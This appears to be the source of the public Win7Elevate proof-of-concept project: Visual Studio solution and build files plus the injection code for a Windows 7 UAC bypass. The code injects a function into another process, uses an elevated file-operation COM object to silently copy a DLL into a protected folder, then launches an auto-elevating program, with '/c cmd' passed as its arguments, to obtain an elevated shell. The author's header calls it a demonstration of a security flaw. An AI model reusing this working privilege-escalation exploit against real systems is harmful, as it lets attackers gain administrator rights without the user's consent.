Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "TIOR", "TIOR\TIOR.vcxproj", "{B36517F4-984C-422C-ADF9-85D5ACD4E30B}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7ElevateDll", "Win7ElevateDll\Win7ElevateDll.vcxproj", "{A1814C92-4DA6-440C-811E-86016AB7433A}"
EndProject
Project("{8BC9CEB8-8B4A-11D0-8D11-00A0C91BC942}") = "Win7Elevate", "Win7Elevate\Win7Elevate.vcxproj", "{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}"
ProjectSection(ProjectDependencies) = postProject
{A1814C92-4DA6-440C-811E-86016AB7433A} = {A1814C92-4DA6-440C-811E-86016AB7433A}
{B36517F4-984C-422C-ADF9-85D5ACD4E30B} = {B36517F4-984C-422C-ADF9-85D5ACD4E30B}
EndProjectSection
EndProject
Global
GlobalSection(SolutionConfigurationPlatforms) = preSolution
Debug|Pocket PC 2003 (ARMV4) = Debug|Pocket PC 2003 (ARMV4)
Debug|Win32 = Debug|Win32
Debug|x64 = Debug|x64
Release|Pocket PC 2003 (ARMV4) = Release|Pocket PC 2003 (ARMV4)
Release|Win32 = Release|Win32
Release|x64 = Release|x64
EndGlobalSection
GlobalSection(ProjectConfigurationPlatforms) = postSolution
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.ActiveCfg = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|Win32.Build.0 = Debug|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Debug|x64.ActiveCfg = Debug|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.ActiveCfg = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|Win32.Build.0 = Release|Win32
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.ActiveCfg = Release|x64
{B36517F4-984C-422C-ADF9-85D5ACD4E30B}.Release|x64.Build.0 = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.ActiveCfg = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|Win32.Build.0 = Debug|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Debug|x64.ActiveCfg = Debug|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.ActiveCfg = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|Win32.Build.0 = Release|Win32
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.ActiveCfg = Release|x64
{A1814C92-4DA6-440C-811E-86016AB7433A}.Release|x64.Build.0 = Release|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Pocket PC 2003 (ARMV4).ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.ActiveCfg = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|Win32.Build.0 = Debug|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Debug|x64.ActiveCfg = Debug|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Pocket PC 2003 (ARMV4).ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.ActiveCfg = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|Win32.Build.0 = Release|Win32
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.ActiveCfg = Release|x64
{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}.Release|x64.Build.0 = Release|x64
EndGlobalSection
GlobalSection(SolutionProperties) = preSolution
HideSolutionNode = FALSE
EndGlobalSection
EndGlobal


@ -0,0 +1,18 @@
//{{NO_DEPENDENCIES}}
// Microsoft Visual C++ generated include file.
// Used by Win7Elevate.rc
//
#define IDD_EMBEDDED_DLL 110
#define IDD_EMBEDDED_TIOR 111
// Next default values for new objects
//
#ifdef APSTUDIO_INVOKED
#ifndef APSTUDIO_READONLY_SYMBOLS
#define _APS_NO_MFC 1
#define _APS_NEXT_RESOURCE_VALUE 139
#define _APS_NEXT_COMMAND_VALUE 32771
#define _APS_NEXT_CONTROL_VALUE 1000
#define _APS_NEXT_SYMED_VALUE 111
#endif
#endif

Binary file not shown.


@ -0,0 +1,82 @@
// Microsoft Visual C++ generated resource script.
//
#include "resource.h"
#define APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
//
// Generated from the TEXTINCLUDE 2 resource.
//
#ifndef APSTUDIO_INVOKED
#include "targetver.h"
#endif
#define APSTUDIO_HIDDEN_SYMBOLS
#include "windows.h"
#undef APSTUDIO_HIDDEN_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
#undef APSTUDIO_READONLY_SYMBOLS
/////////////////////////////////////////////////////////////////////////////
// English (U.S.) resources
#if !defined(AFX_RESOURCE_DLL) || defined(AFX_TARG_ENU)
#ifdef _WIN32
LANGUAGE LANG_ENGLISH, SUBLANG_ENGLISH_US
#pragma code_page(1252)
#endif //_WIN32
#ifdef APSTUDIO_INVOKED
/////////////////////////////////////////////////////////////////////////////
//
// TEXTINCLUDE
//
1 TEXTINCLUDE
BEGIN
"resource.h\0"
END
2 TEXTINCLUDE
BEGIN
"#ifndef APSTUDIO_INVOKED\r\n"
"#include ""targetver.h""\r\n"
"#endif\r\n"
"#define APSTUDIO_HIDDEN_SYMBOLS\r\n"
"#include ""windows.h""\r\n"
"#undef APSTUDIO_HIDDEN_SYMBOLS\r\0"
END
3 TEXTINCLUDE
BEGIN
"#include ""Win7Elevate.rc2\0"
END
#endif // APSTUDIO_INVOKED
#endif // English (U.S.) resources
/////////////////////////////////////////////////////////////////////////////
#ifdef _DEBUG
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Debug\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Debug\\TIOR64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Debug\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Debug\\TIOR32.exe"
#endif
#else // _DEBUG
#ifdef _WIN64
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\x64\\Release\\Win7ElevateDll64.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\x64\\Release\\TIOR64.exe"
#else
IDD_EMBEDDED_DLL BINARY MOVEABLE PURE "..\\Win32\\Release\\Win7ElevateDll32.dll"
IDD_EMBEDDED_TIOR BINARY MOVEABLE PURE "..\\Win32\\Release\\TIOR32.exe"
#endif
#endif


@ -0,0 +1,212 @@
<?xml version="1.0" encoding="utf-8"?>
<Project DefaultTargets="Build" ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup Label="ProjectConfigurations">
<ProjectConfiguration Include="Debug|Win32">
<Configuration>Debug</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Debug|x64">
<Configuration>Debug</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|Win32">
<Configuration>Release</Configuration>
<Platform>Win32</Platform>
</ProjectConfiguration>
<ProjectConfiguration Include="Release|x64">
<Configuration>Release</Configuration>
<Platform>x64</Platform>
</ProjectConfiguration>
</ItemGroup>
<PropertyGroup Label="Globals">
<ProjectGuid>{10BD77FB-69F5-46FA-B69A-DF4947C6D7BB}</ProjectGuid>
<Keyword>Win32Proj</Keyword>
<RootNamespace>Win7Elevate</RootNamespace>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.Default.props" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>true</UseDebugLibraries>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="Configuration">
<ConfigurationType>Application</ConfigurationType>
<UseDebugLibraries>false</UseDebugLibraries>
<WholeProgramOptimization>true</WholeProgramOptimization>
<CharacterSet>Unicode</CharacterSet>
</PropertyGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.props" />
<ImportGroup Label="ExtensionSettings">
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Label="PropertySheets" Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<ImportGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'" Label="PropertySheets">
<Import Project="$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props" Condition="exists('$(UserRootDir)\Microsoft.Cpp.$(Platform).user.props')" Label="LocalAppDataPlatform" />
</ImportGroup>
<PropertyGroup Label="UserMacros" />
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<LinkIncremental>true</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)32</TargetName>
<GenerateManifest>false</GenerateManifest>
</PropertyGroup>
<PropertyGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<LinkIncremental>false</LinkIncremental>
<OutDir>$(SolutionDir)$(Platform)\$(Configuration)\</OutDir>
<TargetName>$(ProjectName)64</TargetName>
</PropertyGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<MinimalRebuild>false</MinimalRebuild>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">
<ClCompile>
<PrecompiledHeader>Use</PrecompiledHeader>
<WarningLevel>Level3</WarningLevel>
<Optimization>Disabled</Optimization>
<PreprocessorDefinitions>WIN32;_DEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<MinimalRebuild>false</MinimalRebuild>
<BasicRuntimeChecks>Default</BasicRuntimeChecks>
<BufferSecurityCheck>false</BufferSecurityCheck>
<FunctionLevelLinking>false</FunctionLevelLinking>
<DebugInformationFormat>ProgramDatabase</DebugInformationFormat>
<RuntimeLibrary>MultiThreadedDebug</RuntimeLibrary>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>true</GenerateDebugInformation>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<PreprocessorDefinitions>WIN32;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
<ResourceCompile>
<PreprocessorDefinitions>WIN32;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemDefinitionGroup Condition="'$(Configuration)|$(Platform)'=='Release|x64'">
<ClCompile>
<WarningLevel>Level3</WarningLevel>
<PrecompiledHeader>Use</PrecompiledHeader>
<Optimization>Disabled</Optimization>
<FunctionLevelLinking>false</FunctionLevelLinking>
<IntrinsicFunctions>false</IntrinsicFunctions>
<PreprocessorDefinitions>WIN64;_WIN64;NDEBUG;_CONSOLE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<BufferSecurityCheck>false</BufferSecurityCheck>
<WholeProgramOptimization>false</WholeProgramOptimization>
</ClCompile>
<Link>
<SubSystem>Console</SubSystem>
<GenerateDebugInformation>false</GenerateDebugInformation>
<EnableCOMDATFolding>true</EnableCOMDATFolding>
<OptimizeReferences>true</OptimizeReferences>
</Link>
<BuildLog>
<Path>
</Path>
</BuildLog>
<ResourceCompile>
<PreprocessorDefinitions>WIN64;_WIN64;_UNICODE;UNICODE;%(PreprocessorDefinitions)</PreprocessorDefinitions>
</ResourceCompile>
</ItemDefinitionGroup>
<ItemGroup>
<ClInclude Include="Resource.h" />
<ClInclude Include="stdafx.h" />
<ClInclude Include="targetver.h" />
<ClInclude Include="Win7Elevate_Inject.h" />
<ClInclude Include="Win7Elevate_Utils.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\CMMN.cpp" />
<ClCompile Include="..\Redirector.cpp" />
<ClCompile Include="stdafx.cpp">
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">Create</PrecompiledHeader>
<PrecompiledHeader Condition="'$(Configuration)|$(Platform)'=='Release|x64'">Create</PrecompiledHeader>
</ClCompile>
<ClCompile Include="Win7Elevate.cpp" />
<ClCompile Include="Win7Elevate_Inject.cpp" />
<ClCompile Include="Win7Elevate_Utils.cpp" />
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Win7Elevate.rc" />
</ItemGroup>
<Import Project="$(VCTargetsPath)\Microsoft.Cpp.targets" />
<ImportGroup Label="ExtensionTargets">
</ImportGroup>
</Project>
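Review bot: `<BufferSecurityCheck>false</BufferSecurityCheck>` and `<Optimization>Disabled</Optimization>` are set in all four ItemDefinitionGroups with no explanation in the project file, so they apply to every translation unit listed below (`..\CMMN.cpp`, `..\Redirector.cpp`, `Win7Elevate_Utils.cpp`), not only the one that needs them. The only stated reason is in Win7Elevate_Inject.cpp, whose comments say the copied function must not do stack checking through the CRT. I would record that next to the setting, e.g. `<!-- /GS and optimisation are off because RemoteCodeFunc is copied into another process; see Win7Elevate_Inject.cpp -->`, so the flags are not mistaken for defaults that are safe to carry into other projects. The Release|Win32 PropertyGroup also sets `<GenerateManifest>false</GenerateManifest>` while Release|x64 does not; if that difference is intended it deserves a comment as well.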


@ -0,0 +1,59 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<ItemGroup>
<Filter Include="Source Files">
<UniqueIdentifier>{4FC737F1-C7A5-4376-A066-2A32D752A2FF}</UniqueIdentifier>
<Extensions>cpp;c;cc;cxx;def;odl;idl;hpj;bat;asm;asmx</Extensions>
</Filter>
<Filter Include="Header Files">
<UniqueIdentifier>{93995380-89BD-4b04-88EB-625FBE52EBFB}</UniqueIdentifier>
<Extensions>h;hpp;hxx;hm;inl;inc;xsd</Extensions>
</Filter>
<Filter Include="Resource Files">
<UniqueIdentifier>{67DA6AB6-F800-4c08-8B7A-83BB121AAD01}</UniqueIdentifier>
<Extensions>rc;ico;cur;bmp;dlg;rc2;rct;bin;rgs;gif;jpg;jpeg;jpe;resx;tiff;tif;png;wav;mfcribbon-ms</Extensions>
</Filter>
</ItemGroup>
<ItemGroup>
<ClInclude Include="stdafx.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="targetver.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Win7Elevate_Inject.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Win7Elevate_Utils.h">
<Filter>Header Files</Filter>
</ClInclude>
<ClInclude Include="Resource.h">
<Filter>Header Files</Filter>
</ClInclude>
</ItemGroup>
<ItemGroup>
<ClCompile Include="stdafx.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Win7Elevate.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Win7Elevate_Inject.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="Win7Elevate_Utils.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\CMMN.cpp">
<Filter>Source Files</Filter>
</ClCompile>
<ClCompile Include="..\Redirector.cpp">
<Filter>Source Files</Filter>
</ClCompile>
</ItemGroup>
<ItemGroup>
<ResourceCompile Include="Win7Elevate.rc">
<Filter>Resource Files</Filter>
</ResourceCompile>
</ItemGroup>
</Project>


@ -0,0 +1,14 @@
<?xml version="1.0" encoding="utf-8"?>
<Project ToolsVersion="4.0" xmlns="http://schemas.microsoft.com/developer/msbuild/2003">
<PropertyGroup>
<ShowAllFiles>false</ShowAllFiles>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">/c cmd</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">/c cmd</LocalDebuggerCommandArguments>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|Win32'">WindowsLocalDebugger</DebuggerFlavor>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Debug|x64'">WindowsLocalDebugger</DebuggerFlavor>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">/c cmd</LocalDebuggerCommandArguments>
<LocalDebuggerCommandArguments Condition="'$(Configuration)|$(Platform)'=='Release|x64'">/c cmd</LocalDebuggerCommandArguments>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|Win32'">WindowsLocalDebugger</DebuggerFlavor>
<DebuggerFlavor Condition="'$(Configuration)|$(Platform)'=='Release|x64'">WindowsLocalDebugger</DebuggerFlavor>
</PropertyGroup>
</Project>


@ -0,0 +1,455 @@
#include "stdafx.h"
#include "Win7Elevate_Utils.h"
#include "Win7Elevate_Inject.h"
#include ".\..\CMMN.h"
// All code (except for GetElevationType) (C) Leo Davidson, 8th February 2009, all rights reserved.
// (Minor tidy-up 12th June 2009 for the code's public release.)
// http://www.pretentiousname.com
// leo@ox.compsoc.net
//
// Using any part of this code for malicious purposes is expressly forbidden.
//
// This proof-of-concept code is intended only to demonstrate that code-injection
// poses a real problem with the default UAC settings in Windows 7 (tested with RC1 build 7100).
struct InjectArgs
{
BOOL (WINAPI *fpFreeLibrary)(HMODULE hLibModule);
HMODULE (WINAPI *fpLoadLibrary)(LPCWSTR lpLibFileName);
FARPROC (WINAPI *fpGetProcAddress)(HMODULE hModule, LPCSTR lpProcName);
BOOL (WINAPI *fpCloseHandle)(HANDLE);
DWORD (WINAPI *fpWaitForSingleObject)(HANDLE,DWORD);
const wchar_t *szSourceDll;
const wchar_t *szElevDir;
const wchar_t *szElevDll;
const wchar_t *szElevDllFull;
const wchar_t *szElevExeFull;
wchar_t *szElevArgs; // Not const because of CreateProcess's in-place buffer modification. It's really not const so this is fine. (We don't use CreateProcess anymore but it doesn't hurt to keep this non-const just in case.)
const wchar_t *szEIFOMoniker; // szElevatedIFileOperationMoniker
const IID *pIID_EIFOClass;
const IID *pIID_EIFO;
const IID *pIID_ShellItem2;
const IID *pIID_Unknown;
const wchar_t *szShell32;
const wchar_t *szOle32;
const char *szCoInitialize;
const char *szCoUninitialize;
const char *szCoGetObject;
const char *szCoCreateInstance;
const char *szSHCreateItemFPN; // SHCreateItemFromParsingName
const char *szShellExecuteExW;
};
static DWORD WINAPI RemoteCodeFunc(LPVOID lpThreadParameter)
{
// This is the injected code of "part 1."
// As this code is copied into another process it cannot refer to any static data (i.e. no string, GUID, etc. constants)
// and it can only directly call functions that are within Kernel32.dll (which is all we need as it lets us call
// LoadLibrary and GetProcAddress). The data we need (strings, GUIDs, etc.) is copied into the remote process and passed to
// us in our InjectArgs structure.
// The compiler settings are important. You have to ensure that RemoteCodeFunc doesn't do any stack checking (since it
// involves a call into the CRT which may not exist (in the same place) in the target process) and isn't made inline
// or anything like that. (Compiler optimizations are best turned off.) You need RemoteCodeFunc to be compiled into a
// contiguous chunk of assembler that calls/reads/writes nothing except its own stack variables and what is passed to it via pArgs.
// It's also important that all asm jump instructions in this code use relative addressing, not absolute. Jumps to absolute
// addresses will not be valid after the code is copied to a different address in the target process. Visual Studio seems
// to use absolute addresses sometimes and relative ones at other times and I'm not sure what triggers one or the other. For example,
// I had a problem with it turning a lot of the if-statements in this code into absolute jumps when compiled for 32-bit and that
// seemed to go away when I set the Release build to generate a PDF file, but then they came back again.
// I never had this problem in February, and 64-bit builds always seem fine, but now in June I'm getting the problem with 32-bit
// builds on my main machine. However, if I switch to the older compiler install and older Windows SDK that I have on another machine
// it always builds a working 32-bit (and 64-bit) version, just like it used to. So I guess something in the compiler/SDK has triggered
// this change but I don't know what. It could just be that things have moved around in memory due to a structure size change and that's
// triggering the different modes... I don't know!
//
// So if the 32-bit version crashes the process you inject into, you probably need to work out how to convince the compiler
// to generate the code it used to in February. :) Or you could write some code to fix up the jump instructions after copying them,
// or hand-code the 32-bit asm (seems you can ignore 64-bit as it always works so far), or find a style of if-statement (or equivalent)
// that always generates relative jumps, or whatever...
//
// Take a look at the asm_code_issue.png image that comes with the source to see what the absolute and relative jumps look like.
//
// PS: I've never written Intel assembler, and it's many years since I've hand-written any type of assembler, so I may have the wrong end
// of the stick about some of this! Either way, 32-bit version works when built on my older compiler/SDK install and usually doesn't on
// the newer install.
InjectArgs * pArgs = reinterpret_cast< InjectArgs * >(lpThreadParameter);
// Use an elevated FileOperation object to copy a file to a protected folder.
// If we're in a process that can do silent COM elevation then we can do this without any prompts.
HMODULE hModuleOle32 = pArgs->fpLoadLibrary(pArgs->szOle32);
HMODULE hModuleShell32 = pArgs->fpLoadLibrary(pArgs->szShell32);
if (hModuleOle32
&& hModuleShell32)
{
// Load the non-Kernel32.dll functions that we need.
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPVOID pvReserved) >
tfpCoInitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoInitialize );
W7EUtils::GetProcAddr< void (STDAPICALLTYPE *)(void) >
tfpCoUninitialize( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoUninitialize );
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(LPCWSTR pszName, BIND_OPTS *pBindOptions, REFIID riid, void **ppv) >
tfpCoGetObject( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoGetObject );
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(REFCLSID rclsid, LPUNKNOWN pUnkOuter, DWORD dwClsContext, REFIID riid, void ** ppv) >
tfpCoCreateInstance( pArgs->fpGetProcAddress, hModuleOle32, pArgs->szCoCreateInstance );
W7EUtils::GetProcAddr< HRESULT (STDAPICALLTYPE *)(PCWSTR pszPath, IBindCtx *pbc, REFIID riid, void **ppv) >
tfpSHCreateItemFromParsingName( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szSHCreateItemFPN );
W7EUtils::GetProcAddr< BOOL (STDAPICALLTYPE *)(LPSHELLEXECUTEINFOW lpExecInfo) >
tfpShellExecuteEx( pArgs->fpGetProcAddress, hModuleShell32, pArgs->szShellExecuteExW );
if (0 != tfpCoInitialize.f
&& 0 != tfpCoUninitialize.f
&& 0 != tfpCoGetObject.f
&& 0 != tfpCoCreateInstance.f
&& 0 != tfpSHCreateItemFromParsingName.f
&& 0 != tfpShellExecuteEx.f)
{
if (S_OK == tfpCoInitialize.f(NULL))
{
BIND_OPTS3 bo;
for(int i = 0; i < sizeof(bo); ++i) { reinterpret_cast< BYTE * >(&bo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
bo.cbStruct = sizeof(bo);
bo.dwClassContext = CLSCTX_LOCAL_SERVER;
// For testing other COM objects/methods, start here.
{
IFileOperation *pFileOp = 0;
IShellItem *pSHISource = 0;
IShellItem *pSHIDestination = 0;
IShellItem *pSHIDelete = 0;
// This is a completely standard call to IFileOperation, if you ignore all the pArgs/func-pointer indirection.
if (
(pArgs->szEIFOMoniker && S_OK == tfpCoGetObject.f( pArgs->szEIFOMoniker, &bo, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
|| (pArgs->pIID_EIFOClass && S_OK == tfpCoCreateInstance.f( *pArgs->pIID_EIFOClass, NULL, CLSCTX_LOCAL_SERVER|CLSCTX_INPROC_SERVER|CLSCTX_INPROC_HANDLER, *pArgs->pIID_EIFO, reinterpret_cast< void ** >(&pFileOp)))
)
if (0 != pFileOp)
if (S_OK == pFileOp->SetOperationFlags(FOF_NOCONFIRMATION|FOF_SILENT|FOFX_SHOWELEVATIONPROMPT|FOFX_NOCOPYHOOKS|FOFX_REQUIREELEVATION))
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szSourceDll, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHISource)))
if (0 != pSHISource)
if (S_OK == tfpSHCreateItemFromParsingName.f( pArgs->szElevDir, NULL, *pArgs->pIID_ShellItem2, reinterpret_cast< void ** >(&pSHIDestination)))
if (0 != pSHIDestination)
if (S_OK == pFileOp->CopyItem(pSHISource, pSHIDestination, pArgs->szElevDll, NULL))
if (S_OK == pFileOp->PerformOperations())
{
// Use ShellExecuteEx to launch the "part 2" target process. Again, a completely standard API call.
// (Note: Don't use CreateProcess as it seems not to do the auto-elevation stuff.)
SHELLEXECUTEINFO shinfo;
for(int i = 0; i < sizeof(shinfo); ++i) { reinterpret_cast< BYTE * >(&shinfo)[i] = 0; } // This loop is easier than pushing ZeroMemory or memset through pArgs.
shinfo.cbSize = sizeof(shinfo);
shinfo.fMask = SEE_MASK_NOCLOSEPROCESS;
shinfo.lpFile = pArgs->szElevExeFull;
shinfo.lpParameters = pArgs->szElevArgs;
shinfo.lpDirectory = pArgs->szElevDir;
shinfo.nShow = SW_SHOW;
if (tfpShellExecuteEx.f(&shinfo) && shinfo.hProcess != NULL)
{
// Wait for the "part 2" target process to finish.
pArgs->fpWaitForSingleObject(shinfo.hProcess, INFINITE);
pArgs->fpCloseHandle(shinfo.hProcess);
}
